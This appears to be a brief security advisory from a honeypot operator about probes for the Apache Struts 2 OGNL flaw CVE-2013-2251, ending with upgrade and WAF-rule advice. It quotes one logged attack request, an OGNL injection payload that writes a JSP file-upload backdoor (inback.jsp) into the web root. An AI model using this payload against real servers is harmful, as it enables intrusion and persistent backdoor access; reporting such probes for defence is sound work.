Today our web honeypot sensors picked up probes for the recent Apache Struts 2.X OGNL vulnerability (CVE-2013-2251):
222.136.0.151 - - [16/Aug/2013:09:25:21 +0200] "GET /index.action?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23p%3d(%23req.getRealPath(%22/%22)%2b%22inback.jsp%22).replaceAll(\"\\\\\\\\\",%20\"/\"),new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e HTTP/1.1" 404 291 "-" "Sturt2"
Struts users are strongly encouraged to upgrade to v2.3.15.1.
ModSecurity Virtual Patches
If you are not able to upgrade, you can also use ModSecurity WAF and our commercial SpiderLabs ModSecurity rules as we have added protections to mitigate this issue.
